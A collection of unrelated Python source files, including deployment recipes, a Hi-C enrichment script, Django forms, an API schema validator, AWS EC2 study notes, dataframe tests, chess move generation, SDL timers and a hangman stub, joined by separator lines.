end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0)))
)
bruvdeployment = Recipe(
BRUVDeployment,
start_position=Point(12.4604, 43.9420),
end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0)))
)
tvdeployment = Recipe(
TVDeployment,
start_position=Point(12.4604, 43.9420),
end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0)))
)
tideployment = Recipe(
TIDeployment,
start_position=Point(12.4604, 43.9420),
end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0))))
|
#!/usr/bin/env python
import h5py
import numpy as np
import sys
file = h5py.File("out.heat")
# print file.keys()
counts = file['0.counts'][...]
expected_counts = file['0.expected'][...]
positions = file['0.positions'][...]
regions = file['regions'][...]
start = regions[0][4]
end = regions[0][5]
peak_list = []
for line in open(sys.argv[1]):
line = line.rstrip("\r\n").split("\t")
if line[0] == "chrX" and int(line[1]) > start and int(line[1]) < end:
peak_list.append(int(line[1]))
where = np.where(counts > 0 )
enrichment = np.empty([1039,1039])
enrichment[where] = np.log(counts[where]/expected_counts[where])
for i in peak_list:
highest_enriched = 0
for num, m in enumerate(positions):
if i > m[0] and i < m[1]:
for column in range(0,len(positions)):
if enrichment[num][column] > highest_enriched:
highest_enriched = enrichment[num][column]
interactor_pos = positions[column]
print i, m, interactor_pos, highest_enriched
|
from datetimewidget.widgets import DateTimeWidget
from django import forms
# class UserRegistrationForm(forms.Form):
# phone_number = forms.CharField(
# required = True,
# label = '',
# max_length = 32
# )
# first_name = forms.CharField(
# required = True,
# label = 'Email',
# max_length = 32,
# )
# last_name = forms.CharField(
# required = True,
# label = 'Password',
# max_length = 32,
# widget = forms.PasswordInput()
# )
# type = forms.ChoiceField()
from django.contrib.auth.forms import AuthenticationForm
from django.forms import ModelForm, SelectDateWidget
from worker.models import User, WorkerProfile, WorkerSkill, ContractorProfile, HireWorker
class UserRegistrationForm(ModelForm):
password = forms.CharField(label='Password', widget=forms.PasswordInput)
class Meta:
model = User
fields = ['first_name', 'last_name', 'type', 'phone_number', 'email']
class LoginForm(forms.Form):
phone_number = forms.RegexField(regex=r'^\d{10,15}$', error_messages={
'invalid': ("please enter valid mobile number"),
'unique': ("My message for unique") # <- THIS
})
password = forms.CharField(label = 'password', widget = forms.PasswordInput)
class ProfileForm(ModelForm):
about = forms.CharField(widget = forms.Textarea({'cols': '30', 'rows': '10'}))
class Meta:
model = WorkerProfile
exclude = ('user',)
class ContractorProfileForm(ModelForm):
class Meta:
model = ContractorProfile
exclude = ('user',)
class WorkerSkillForm(ModelForm):
class Meta:
model = WorkerSkill
exclude =('user', 'hired_by','status')
widgets = {
# Use localization and bootstrap 3
'datetime': DateTimeWidget(attrs={'id': "from_date"}, usel10n=True, bootstrap_version=3)
}
class HireSkillForm(ModelForm):
to_date = forms.DateField(
widget=SelectDateWidget(
empty_label=("Choose Year", "Choose Month", "Choose Day"),
),
)
from_date = forms.DateField(
widget=SelectDateWidget(
empty_label=("Choose Year", "Choose Month", "Choose Day"),
),
)
class Meta:
model = HireWorker
fields =('from_date', 'to_date')
|
__author__ = 'izaac'
import validictory
import json
import requests
# Validator following the http://json-schema.org guidelines using the python validictory library
# This is for integration and acceptance test
schema_following = {
"type": "object",
"properties": {
"user_is_following": {
"type": "array",
"items": [
{"type": "object",
"properties": {
"username": {"type": "string"},
"id": {"type": "integer"}
}
}
]
}
}
}
schema_followers = {
"type": "object",
"properties": {
"its_followers": {
"type": "array",
"items": [
{"type": "object",
"properties": {
"username": {"type": "string"},
"id": {"type": "integer"}
}
}
]
}
}
}
schema_message = {
"type": "object",
"properties": {
"message": {"type": "string"}
}
}
# Known validictory module issue about the _data is not of type object
# https://github.com/sunlightlabs/validictory/issues/49
# TODO: Follow up bug for validation/regression
schema_twitt = {
"type": "object",
"properties": {
"messages": {
"type": "array",
"items": [
{"type": "object",
"properties": {
"text": {"type": "string"},
"pub_date": {
"type": "array",
"items": [
{"type": "string"},
{"type": "string"}
]
}
}
}
]
}
}
}
def validate_json():
headers = {'content-type': 'application/json'}
#test following
r = requests.get('http://127.0.0.1:5000/user/user1/following?key=d5ef19c2b1714f87e0042e4f822bf722b30239f7',
headers=headers)
try:
validictory.validate(r.content, schema_following)
except ValueError, error:
print error
########################################################
# /user/<username>/following
# {
# "its_followers": [
# {
# "username": "user8",
# "id": 8
# }
# ]
# }
#json_followers = json.loads('{"its_followers": [{"username": "user8", "id": 8}]}')
########################################################
# Generic json message
# {
# "message": "<String>"
# }
#json_message = json.loads('{"message": "You can\'t follow user2"}')
########################################################
# /user/<username>
# {
# "messages": [
# {
# "text": "example message",
# "pub_date": [
# "2013-05-08",
# "07:59:13"
# ],
# "message_id": 98,
# "user_id": 3
# }
# }
#
# dump_twitt = json.dumps('{"messages": [ { "text": "example text", \
# "pub_date": ["2013-05-08", "07:59:13" ], \
# "message_id": 98, "user_id": 3 }}')
# json_twitt = json.loads(dump_twitt)
#
#
# try:
# validictory.validate(json_twitt, schema_twitt)
# except ValueError, error:
# print errro
|
"""
https://www.hackerrank.com/challenges/reduced-string/problem
string s: a string to reduce
"""
def superReducedString(s):
s = list(s)
i = 0
while i < len(s) - 1:
if s[i] == s[i+1]:
del s[i]
del s[i]
i = 0
if len(s) == 0:
return "Empty String"
else:
i += 1
return "".join(s)
|
# coding: utf-8
# # EC2
#
# * EC2 stands for Elastic Compute Cloud
#
# * web service that provides resizable compute compute capacity in cloud.
# * reduce time req to obtain, boot new server to minutes
# * allows quick scale in capacity both up and down and requirements change.
#
# * what is it? It is a virtual linux|windows server
#
# * Startups now do not require dollars for hardware, they can experiment!
#
# * allow you to pay only for the capacity that you actually use.
# * provides dev the tools to build failure resilient applications and isolate themselves from common failure scenarios
#
# ## EC2 Options
#
# * __On Demand__ allow you to pay fixed rate by hour or second with no commitment
# * users want low cost, flexibility of ec2 without up front payment or commitment
# * apps with short term, spiky or unpredictable workloads that cannot be interrupted
# * apps developed or tested on ec2 for first time
#
# * __reserved__ provide you with capacity reservation, offer significant discount on hourly charge, 1 year or 3 year terms.
# * steady state or predicatable usage
# * apps that require reserved capacity
# * user able to make up front payments to reduce compute costs even further
# * standard RI (up to 75% discount) RI = reserved instance;
# * convertible RI ( up to 54% discount) capability to change attributes of RI as long as the exchange results in the createion of RI of equal or greater value
# * scheduled RI's available to launch within timeframe you reserve. Match capacity to predictable recurrinng schedule (eg batch jobs)
#
# * __spot__ bid whatever price you want for instance capacity, providing for even greater savings if your applications have flexible start and end times. You set your bid price (how much you are willing pay), if the price goes above your price, your machine shuts down. If below, then your machine fires up!
# * flexible start/end times
# * apps that are only feasible at very low compute prices
# * users with urgent computing needs for large amounts of additional capacity
# * if you terminate instance before hour is complete, you pay for whole hour anyway.
# * if amazon terminates instance, you get the hour it was terminated in for free! :)
#
# * __Dedicated Hosts__ physical ec2 server dedicated for your use. reduce cost by allowing you to use your existing server-bound software licenses.
# * useful for regulatory req that doesn't support multi tenant virtualization
# * great for licensing that doesn't support multi tenant v.
# * can be purchased on-demand (hourly)
# * can be purchased as a reservation for up to 70% off the on demand price.
#
#
# Letter is type, Number is generation
#
# eg D for Dense, 2 for 2nd generation!
#
#
# | Family | Speciality | Use Case |
# | --- | --- | --- |
# | d2 | Dense Storage | Fileservers / Data Warehouse|
# | r4 | Memory Optimized | Mem intesive apps (r = ram)|
# | m4 | General Purpose | Application SErvers (m = main choice)|
# | c4 | Compute Optimized | CPU intensive |
# | g2 | Graphics intesive| video encoding/3d app streaming|
# | i2 | High Speed Storage | nosql, data warehsouse (i = iops)|
# | f1 | field programmable gate array | hardware accelarate your code |
# | t2 | low cost general purpose | web servers/ small db (t= tiny) |
# | p2 | graphics / general purpose GPU | machine learning, bit coin mining |
# | x1 | memory optimized| SAP Hana/Apache Spark/etc (x=extream memory)|
#
#
# ##### ec2 intance types
# * d - density
# * r - ram
# * m - main choice
# * c - compute
# * g - graphics
# * i - iops
# * f - fpga
# * t - tiny general purpose
# * p - graphics
# * x - extreame memory
#
# dr mc gift px
#
#
#
# # EBS
# __ebs__ allows you to
# * create storage volumes and attach them to ec2 instance
# * create file system on that volume
# * they are placed in a specific availability zone where they are automatically replicated to protect from failure of a single component.
# * block based storage (so can install OS, DB, etc), not file based like S3
#
# * you cannot mount 1 EBS volume to multiple EC2 instances, instead use EFS
#
# ### EBS Volume Types
# * 4 or 5 of them
# * General Purpose SSD (GP2)
# * balance price and performance
# * 3 IOPS per gig, up to 10,000 IPOS; ability to burst up to 3000 IOPS for extended periods of time for volumns at 3334 GiB and above
# * Provisioned IOPS SSD (IO1)
# * IO intensive apps like large db or nosql db
# * use if need more than 10,000 IOPS
# * up to 20,000 IOPS
# * Throughput Optimized HDD (ST1)
# * old style hard drive (magnetic)
# * big data]
# * data warehaouse
# * log processing
# * cannot be a boot volume
# * Cold HDD (SC1)
# * lowest cost storage for infrequence accessed workloads
# * file server
# * not boot volume
# * magnetic (standard)
# * lowest cost per gig that is bootable. mag vol ideal for workloads where data is access infrequently, apps where lowest storage cost is important
#
#
# ## Launch EC2 - ec2 lab 101
# Two types of virtualization
# * HVM hyper virtual machine
# * PVM Para virtual machine NFI what the difference is.
#
# Launch
# * select Amazon Linux AMI (HVM), includes bunch of stuff including aws cli)
# * subnet: one subnet = one availability zone, a subnet cannot cross av. zones.
# * In Advanced Details > User Data: can add details like download and install anaconconda, install product x, etc.
# * Security Groups === Firewall
#
# * Connect to EC2
# ```
# ssh -i "cloudops_training.pem" ec2-user@ec2-13-54-65-78.ap-southeast-2.compute.amazonaws.com
# ```
#
# * Install Apache
# ```
# yum update
# yum install httpd
# cd /var/www/html
# vi index.html
# <html><h1>Hello Cloud Gurus!</h1></html>
# :wq
# service httpd start
# chkconfig httpd on # start httpd on boot.
# ```
# * Navigate on web browser to public name, and web page will start!
# * EC2 Console
#
# * System Status Check - verifies that the hardware to connect to your virtual machine is ok.
# * Instance Status Check - verifies that your machine is ok.
# * Reserved Instances
# * select reserved instance from menu
# * select options
# * review costs
# Note:
# * Termination Protection is turned off by default, you must turn it on
# * on EBS instance, default actions if for root EBS vol to be deleted when instance is terminated.
# * EBS root vol of DEFAULT ami cannot be encrypted.
# * can use 3rd party tools to encrypt (eg bit locker on windows)
# * create your own AMI, in process - encrypt root vol.
# * Additional volumes can be encrypted.
# ## PUTTY and PUTTYKeyGen
# * when creating an EC2, save PEM file
# * use puttykeygen to convert PEM to PPK
# * save PPK file into putty config
# * good to go!
# ## Security Groups
#
# * From security Groups on AWS console
# * any change applied immediatly
# * if remove HTTP from a rule, then HTTP is no longer available.
#
# * Rules are STATEFUL
# * if you allow something IN, then it is automatically allowed back out.
# * you can remove the rules for OUTBOUND, and everything still works.
# * ssh session freezes though
#
# * Everything is deny by default.
# * can add multiple security groups to a single machine, they are cumulative.
# * there is no deny, so cannot be a conflict.
#
# * NACL are STATELESS (inbound does not allow outbound). NACL network access control list
# * cannot block using SG, need to use NACL
# ## Storage
# ---
#
# * create an EC2 with a bunch of different storage types
# * navigate to volumes
# * select gp2 (boot volume)
# * actions > create snapshot
# * Once created, navigate to snapshots, then you can create a volumn from a snapshot
# * you can determine the availability zone it should reside in
# * you can change the volume type (SSD, Cold HDD, etc)
# ---
# * more in snapshots
# * copy - can copy a snapshot to anywhere in the world (ie change region).
# * so, to move an instance from one region to another
# * create snapshot
# * copy snapshot to other region
# * create image from snapshot
# * create ec2 from volume
#
# ---
# * To create a new image:
# * create snapshot
# * select snapshot, actions > create image
# * navigate to Images > AMI (takes a while to show up)
#
# ---
# * NOTE: if create image from snapshot from machine with multiple disks, it fucks up.
# * instead, create image from working machine and in the process, remove the extra disks
# * running machine > actions > create image > remove extra disks > go
#
# ---
# * NOTE2: when terminating (deleting) instances, only the root volume is removed. ANy other volume needs to be manully removed from the volume tab.
#
# ---
# * Volumes exist on EBS - they are just a virtual hard disk
# * root devise is where OS installed
# * snapshot exist on S3 (but it is not visible)
# * snapshot is a point in time of volume
# * after time, next snap is just the diff from the prev snap.
#
# * to backup a EBS root vol, should probably stop instance first.
# * but you can take a snap while running
# * create AMI from volume or snapshot
# * can change EBS vol size on fly... and also change storage type on the fly
# * volumes always in the same availability zone as the ec2
# ---
# * snapshots of encrypted vol are encrypted automatically
# * vol restored from encrypted snapshot are encrypted automatically
# * you can share snapshot, but only if unencrypted
# * snapshot can be shared with other aws accounts, or made public.
# ---
#
#
#
# ## EFS - Elastic File System
# ---
# * file storage for Elastic compute Cloud (EC2)
# * create and configure file systems quickly
# * storage is elastic, grow and shrink automagically as you add/remove files
# ---
# * support NFSv4 - Network File System ver 4
# * only pay for what you use (no pre-provisioning)
# * scale up to petabyte
# * can support thousands of concurrent NFS connections
# * data is stored across multiple AZ within a region
# * block based storage (not object based storage), can share with other ec2 instances
# * Read after Write consistency
#
# ### Setup Web Server with load balancing
# * Navigate to EFS > create filesystem > defaults and Tags > Create
# * Create 2 EC2 instances with httpd installed, on each, set the subnet to a different AZ
# * check that EC2 instances are in same security group as the EFS
# * Create a Load Balancer > give it a name > default VPC > Security Group > Add in both EC2 instances
# * Install httpd on both, and start
# * verify /var/www/html is empty on both machines
# * Navigate back to EFS > Select your EFS > click on "ec2 mount instructions". Most of the software has already been installed...just need the last command.
# * sudo mount -t nfs $(curl -a http://x.x.x.x/latest/meta-data/placement/availability-zone).fs...com:/ efs
# * default is to mount onto /efs (last part of command above)
# * change to sudo mount -t nfs $(curl -a http://x.x.x.x/latest/meta-data/placement/availability-zone).fs...com:/ /var/www/html
# * create index.html with stuff in it
# * go to Load Balancer > instances > check health - shoudl be "in service"
# * description tab gives DNS name, navigate to there, should be your web page!
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
# File called _pytest for PyCharm compatability
from tests.common import TestData
class TestDataFrameDrop(TestData):
def test_drop(self, df):
df.drop(labels=["Carrier", "DestCityName"], axis=1)
df.drop(columns=["Carrier", "DestCityName"])
df.drop(["1", "2"])
df.drop(labels=["1", "2"], axis=0)
df.drop(index=["1", "2"])
df.drop(labels="3", axis=0)
df.drop(columns="Carrier")
df.drop(columns=["Carrier", "Carrier_1"], errors="ignore")
df.drop(columns=["Carrier_1"], errors="ignore")
def test_drop_all_columns(self, df):
all_columns = list(df.columns)
rows = df.shape[0]
for dropped in (
df.drop(labels=all_columns, axis=1),
df.drop(columns=all_columns),
df.drop(all_columns, axis=1),
):
assert dropped.shape == (rows, 0)
assert list(dropped.columns) == []
def test_drop_all_index(self, df):
all_index = list(df.pd.index)
cols = df.shape[1]
for dropped in (
df.drop(all_index),
df.drop(all_index, axis=0),
df.drop(index=all_index),
):
assert dropped.shape == (0, cols)
assert list(dropped.to_pandas().index) == []
def test_drop_raises(self):
ed_flights = self.ed_flights()
with pytest.raises(
ValueError, match="Cannot specify both 'labels' and 'index'/'columns'"
):
ed_flights.drop(
labels=["Carrier", "DestCityName"], columns=["Carrier", "DestCityName"]
)
with pytest.raises(
ValueError, match="Cannot specify both 'labels' and 'index'/'columns'"
):
ed_flights.drop(labels=["Carrier", "DestCityName"], index=[0, 1, 2])
with pytest.raises(
ValueError,
match="Need to specify at least one of 'labels', 'index' or 'columns'",
):
ed_flights.drop()
with pytest.raises(
ValueError,
match="number of labels 0!=2 not contained in axis",
):
ed_flights.drop(errors="raise", axis=0, labels=["-1", "-2"])
with pytest.raises(ValueError) as error:
ed_flights.drop(columns=["Carrier_1"], errors="raise")
assert str(error.value) == "labels ['Carrier_1'] not contained in axis"
|
import argparse
import logging
import math
import os
import pathlib
import shutil
import subprocess
def app_path_arg_validate(path):
path = os.path.abspath(str(path))
if not os.access(path, os.F_OK | os.R_OK | os.X_OK):
raise argparse.ArgumentTypeError(
f"Specified application could not be found: {path}")
return pathlib.Path(path)
def add_app_path_arg(parser, *, app):
try:
default = app_path_arg_validate(shutil.which(app))
except argparse.ArgumentTypeError:
default = None
except TypeError:
default = None
except ValueError:
default = None
if default:
help = f"Specify path for '{app}' application (optional)"
required = False
else:
help = f"Specify path for '{app}' application"
required = True
parser.add_argument(
f"--path-{app}",
help=help,
type=app_path_arg_validate,
dest=f"path_{app}",
default=default,
required=required)
def run_and_parse_font_config_binary(binary, *, args, fields):
sep = "\n/\1/\n"
format_string = sep.join(["%{" + field + "}" for field in fields])
output = subprocess.check_output(
[binary] + args + ["--format", format_string])
output = output.decode("utf-8")
values = output.split(sep)
if len(values) != len(fields):
raise argparse.ArgumentTypeError(
f"Unable to parse fontconfig binary {binary} output: "
f"expected {len(fields)} values for fields {fields}, but "
f"got {len(values)}. Raw output: {output}.")
return dict(zip(fields, values))
def font_file_arg(path):
if pathlib.Path(path).exists():
return path.resolve()
path_fc_pattern = shutil.which("fc-pattern")
path_fc_match = shutil.which("fc-match")
if not path_fc_pattern or not path_fc_match:
raise argparse.ArgumentTypeError(
f"Provided value ({path}) is not a file. Cannot parse as "
f"[fontconfig] pattern because [fc-pattern] and [fc-match] "
f"are not in path.")
parsed_pattern = run_and_parse_font_config_binary(
path_fc_pattern,
args=[path],
fields=["family", "style"])
best_guess = run_and_parse_font_config_binary(
path_fc_match,
args=[path],
fields=["file", "family", "style"])
file = best_guess["file"]
def parse_style(style):
style = style.lower()
if "regular" in style.split(","):
return ""
return style
best_guess["style"] = parse_style(best_guess["style"])
parsed_pattern["style"] = parse_style(parsed_pattern["style"])
if best_guess["family"] != parsed_pattern["family"] or \
best_guess["style"] != parsed_pattern["style"]:
logging.warn(
f"Using font {best_guess['family']} ({best_guess['style']}) "
f"from {file}, which approximately matches provided "
f"query ({path}) which was interpretted as "
f"{parsed_pattern['family']} ({parsed_pattern['style']})")
return file
# Safe conversion of logarithm to floor integer value
def safe_int_log(value, base):
log = int(math.floor(math.log(value, base)))
while base ** log > value:
log -= 1
while base ** (log + 1) <= value:
log += 1
return log
__all__ = ["add_app_path_arg", "safe_int_log"]
|
import abc
from chess import coords
from chess import move
BISHOP_DIRS = {(1, 1), (1, -1), (-1, 1), (-1, -1)}
ROOK_DIRS = {(0, 1), (0, -1), (-1, 0), (1, 0)}
KNIGHT_DIRS = {(2, 1), (2, -1), (1, 2), (1, -2), (-1, 2), (-1, -2), (-2, 1), (-2, -1)}
class Piece(abc.ABC):
def __init__(self, pos: coords.Coords, col: bool):
self.pos = pos
self.col = col
def moves_in_dir(self, board, direc: (int, int), limit=7):
x = self.pos.x + direc[0]
y = self.pos.y + direc[1]
while 0 <= x <= 7 and 0 <= y <= 7 and limit > 0:
limit -= 1
# white piece
if board.is_white_piece(coords.Coords(x, y)):
if not self.col:
yield move.Move(self, self.pos, coords.Coords(x, y), capture = True)
break
# black piece
if board.is_black_piece(coords.Coords(x, y)):
if self.col:
yield move.Move(self, self.pos, coords.Coords(x, y), capture = True)
break
# open square
yield move.Move(self, self.pos, coords.Coords(x, y))
x += direc[0]
y += direc[1]
def set_pos(self, pos: coords.Coords):
self.pos = pos
def value(self):
return self.val << (6 - self.col * 6)
@abc.abstractmethod
def generate_moves(self, board):
pass
@abc.abstractmethod
def attacked_squares(self, board):
pass
@property
@abc.abstractmethod
def val(self):
pass
class Pawn(Piece):
def __str__(self):
return ""
def get_direc(self):
return self.col * -2 + 1
def generate_moves(self, board):
# direction the pawn is going
ny = self.pos.y + self.get_direc()
if board.is_free(coords.Coords(self.pos.x, ny)):
yield move.Move(self, self.pos, coords.Coords(self.pos.x, ny))
# if pawn is on starting square
if self.pos.y == 1 + 5 * self.col:
ny = self.pos.y + self.get_direc() * 2
if board.is_free(coords.Coords(self.pos.x, ny)):
yield move.DoublePawnMove(self, self.pos, coords.Coords(self.pos.x, ny))
for s in self.attacked_squares(board):
yield move.Move(self, self.pos, s, capture = True)
def attacked_squares(self, board):
ny = self.pos.y + self.get_direc()
if self.pos.x != 0:
nx = self.pos.x - 1
if board.is_black_piece(coords.Coords(nx, ny)):
if self.col:
yield coords.Coords(nx, ny)
if board.is_white_piece(coords.Coords(nx, ny)):
if not self.col:
yield coords.Coords(nx, ny)
if self.pos.x != 7:
nx = self.pos.x + 1
if board.is_black_piece(coords.Coords(nx, ny)):
if self.col:
yield coords.Coords(nx, ny)
if board.is_white_piece(coords.Coords(nx, ny)):
if not self.col:
yield coords.Coords(nx, ny)
# TODO En Passent
@property
def val(self):
return 1
class Knight(Piece):
def __str__(self):
return "N"
def generate_moves(self, board):
for direc in KNIGHT_DIRS:
yield from self.moves_in_dir(board, direc, limit=1)
def attacked_squares(self, board):
for m in self.generate_moves(board):
yield m.end
@property
def val(self):
return 2
class Bishop(Piece):
def __str__(self):
return "B"
def generate_moves(self, board):
for direc in BISHOP_DIRS:
yield from self.moves_in_dir(board, direc)
def attacked_squares(self, board):
for m in self.generate_moves(board):
yield m.end
@property
def val(self):
return 4
class Rook(Piece):
def __str__(self):
return "R"
def generate_moves(self, board):
for direc in ROOK_DIRS:
yield from self.moves_in_dir(board, direc)
def attacked_squares(self, board):
for m in self.generate_moves(board):
yield m.end
@property
def val(self):
return 8
class Queen(Piece):
def __str__(self):
return "Q"
def generate_moves(self, board):
for direc in BISHOP_DIRS | ROOK_DIRS:
yield from self.moves_in_dir(board, direc)
def attacked_squares(self, board):
for m in self.generate_moves(board):
yield m.end
@property
def val(self):
return 16
class King(Piece):
def __str__(self):
return "K"
def generate_moves(self, board):
for direc in BISHOP_DIRS | ROOK_DIRS:
yield from self.moves_in_dir(board, direc, limit=1)
def attacked_squares(self, board):
for m in self.generate_moves(board):
yield m.end
@property
def val(self):
return 32
|
import pygame, time, random, settings,model
car_exit=pygame.image.load('cartinki/EXIT.png')
car_exit=pygame.transform.scale(car_exit,[100,50])
exit_rect=pygame.Rect(900,0,100,50)
def paint(screen):
# рисуем кадр
pygame.draw.rect(screen, [100, 250, 200], [0, 0, 1300, 700], 0)
for security in model.blocks:
pygame.draw.rect(screen,[100,250,50],security,10)
pygame.draw.rect(screen, [250, 100, 10], model.platforma, 0)
screen.blit(car_exit,exit_rect)
# pygame.draw.rect(screen,[0,0,0],exit_rect)
pygame.draw.circle(screen, [200, 0, 0], [model.krug.centerx, model.krug.centery], 20)
pygame.display.flip() |
# -*- coding: utf-8 -*-
__author__ = 'Jonathan Mulle & Austin Hurst'
from sdl2 import SDL_GetPerformanceCounter, SDL_GetPerformanceFrequency
# TODO: Clean up the docs and code here
def precise_time():
"""Returns the time (in seconds) since the task was launched.
The time returned has sub-millisecond precision and is independent of the
system's clock, so it won't be disrupted by things like network clock
synchronization or daylight savings time.
Should be used instead of Python's ``time.time()`` when precision is more
important than getting a value that can be converted to real-world time.
Returns:
float: Seconds since the task was launched.
"""
try:
return SDL_GetPerformanceCounter() / precise_time.freq
except AttributeError:
precise_time.freq = float(SDL_GetPerformanceFrequency())
return SDL_GetPerformanceCounter() / precise_time.freq
def time_msec():
"""Returns the time (in milliseconds) since the task was launched.
See :func:`precise_time` for more info.
Returns:
float: Milliseconds since the task was launched.
"""
return precise_time() * 1000
class CountDown(object):
"""A timer that counts down to 0 for a given duration. Can be paused, reset, extended,
and checked for time remaining or elapsed, making it flexible and useful for many different
situations.
Args:
duration(float): The duration in seconds that the timer should count down for.
start(bool, optional): Whether to start the countdown immediately upon creation. Defaults
to True.
Attributes:
duration(float): The duration that the timer is set to count down for.
started(bool): Whether the countdown timer has been started yet.
paused(bool): The current pause state of the countdown timer.
Raises:
ValueError: if the duration specified is not a positive real number.
"""
__started = 0
__pause_time = 0.0
__flex = 0.0 # for add() and finish()
__paused = False
__duration = 0
def __init__(self, duration, start=True):
super(CountDown, self).__init__()
self.duration = duration
self.reset(start)
def start(self):
"""Starts the countdown if it has not started already.
Raises:
RuntimeError: If called after the countdown has already been started.
"""
if not self.started:
self.__started = precise_time()
self.__paused = False
else:
err = "Cannot start CountDown that's already started (use reset method instead)."
raise RuntimeError(err)
def counting(self):
"""Indicates whether the timer is currently counting down or not.
Returns:
bool: False if the countdown is paused or has finished, otherwise True.
"""
if self.paused:
return False
else:
return self.remaining() > 0
def reset(self, start=True):
"""Resets the countdown so it starts back at the original duration.
Args:
start(bool, optional): If True, the countdown will immediately start again after
resetting. If False, the countdown will be reset into a paused state. Defaults
to True.
"""
self.__started = 0
self.__pause_time = 0.0
self.__flex = 0.0
if start:
self.start()
else:
self.pause()
def finish(self):
"""Ends the countdown by jumping the time remaining directly to zero.
"""
self.__flex += self.remaining()
def add(self, delta):
"""Add an amount of time to (or subtract an amount from) the elapsed time of the countdown.
Note that a CountDown's time elapsed is clipped such that it can be no less than zero and
no larger than the timer's set duration: for example, 'self.add(-100)' when 5 seconds has
elapsed in the CountDown will only reduce the elapsed time to 0, and 'self.add(100)' when
the CountDown's duration is 8 seconds will only increase the elapsed time to 8.
Args:
delta(float): The number of seconds to add to the countdown timer. Can be a positive
or negative number.
"""
if (self.elapsed() + delta) < 0:
# ensure subtraction will never result in negative duration
delta = 0 - self.elapsed()
elif delta >= self.remaining():
# end timer if duration added is greater than time remaining
delta = self.remaining()
self.__flex += delta
def pause(self):
"""Pauses the countdown if it is not already paused. The countdown can later be resumed
with the resume() method. Does nothing if the timer is already paused.
"""
if not self.paused:
self.__paused = precise_time()
def resume(self):
"""Unpauses the countdown if it is currently paused. Does nothing if it is not paused.
"""
if self.paused:
self.__pause_time += precise_time() - self.__paused
self.__paused = False
def remaining(self):
"""Returns the amount of time remaining in the countdown (in seconds). Will return 0 if the
countdown has ended.
"""
return self.duration - self.elapsed()
def elapsed(self):
"""Returns the amount of time elapsed in the countdown (in seconds). If the countdown has
finished, the value returned will be equal to the countdown duration (e.g. 2.5 for a
finished countdown with a duration of 2.5 seconds)
"""
if not self.started:
t = self.__flex
elif self.paused:
t = (self.__paused + self.__flex) - (self.__started + self.__pause_time)
else:
t = (precise_time() + self.__flex) - (self.__started + self.__pause_time)
return t if t < self.duration else self.duration
@property
def started(self):
return self.__started != 0
@property
def paused(self):
return self.__paused is not False
@property
def duration(self):
return self.__duration
@duration.setter
def duration(self, value):
try:
self.__duration = float(value)
except ValueError:
raise ValueError("Duration must be a positive real number.")
if value <= 0:
err = ("Authorization Denied: negative and null duration privileges restricted to "
"user dr_who.")
raise ValueError(err)
class Stopwatch(object):
"""A timer that counts upwards and can be paused, resumed, and reset, just like a stopwatch.
Args:
start(bool, optional): Whether to start the stopwatch immediately upon creation. Defaults
to True.
Attributes:
started(bool): Whether the stopwatch timer has been started yet.
paused(bool): The current pause state of the stopwatch timer.
"""
__started = 0
__pause_time = 0.0
__flex = 0.0 # for add()
__paused = False
def __init__(self, start=True):
super(Stopwatch, self).__init__()
if start: self.start()
def start(self):
"""Starts the stopwatch if it has not started already.
Raises:
RuntimeError: If called after the stopwatch has already been started.
"""
if self.__started == 0:
self.__started = precise_time()
self.__paused = False
else:
err = "Cannot start Stopwatch that's already started (use reset method instead)."
raise RuntimeError(err)
def reset(self, start=True):
"""Resets the stopwatch so it starts back at zero.
Args:
start(bool, optional): If True, the stopwatch will immediately start again after
resetting. If False, the stopwatch will be reset into a paused state. Defaults
to True.
"""
self.__started = 0
self.__pause_time = 0.0
self.__flex = 0.0
if start:
self.start()
else:
self.pause()
def add(self, duration):
"""Add an amount of time to (or subtract an amount from) the stopwatch timer.
Args:
duration(float): The number of seconds to add to the stopwatch timer. Can be a positive
or negative number.
"""
self.__flex += duration
def pause(self):
"""Pauses the stopwatch if it is not already paused. The stopwatch can later be resumed
with the resume() method. Does nothing if the timer is already paused.
"""
if not self.paused:
self.__paused = precise_time()
def resume(self):
"""Unpauses the stopwatch if it is currently paused. Does nothing if the timer is not
paused.
"""
if self.paused:
self.__pause_time += precise_time() - self.__paused
self.__paused = False
def elapsed(self):
"""Returns the amount of time elapsed on the stopwatch (in seconds).
"""
if self.__started == 0:
return self.__flex
elif self.paused:
return (self.__paused + self.__flex) - (self.__started + self.__pause_time)
else:
return (precise_time() + self.__flex) - (self.__started + self.__pause_time)
@property
def started(self):
return self.__started != 0
@property
def paused(self):
return self.__paused is not False
|
# -*- coding: utf-8 -*-
# Jogo da forca
# POO
# importar arquivos
# import random
# Criar tabuleiro usando LISTA
tabuleiro=['''
+----+
| |
|
|
|
|
==========''', '''
+----+
| |
O |
|
|
|
==========''','''
+----+
| |
O |
| |
|
|
==========''', '''
+----+
| |
O |
/| |
|
|
==========''', '''
+----+
| |
O |
/|\ |
|
|
==========''', '''
+----+
| |
O |
/|\ |
/ |
|
==========''', '''
+----+
| |
O |
/|\ |
/ \ |
|
==========''']
#Classe
class Hangman:
def __init__(self, word): #isso aqui é um método
self.word = word
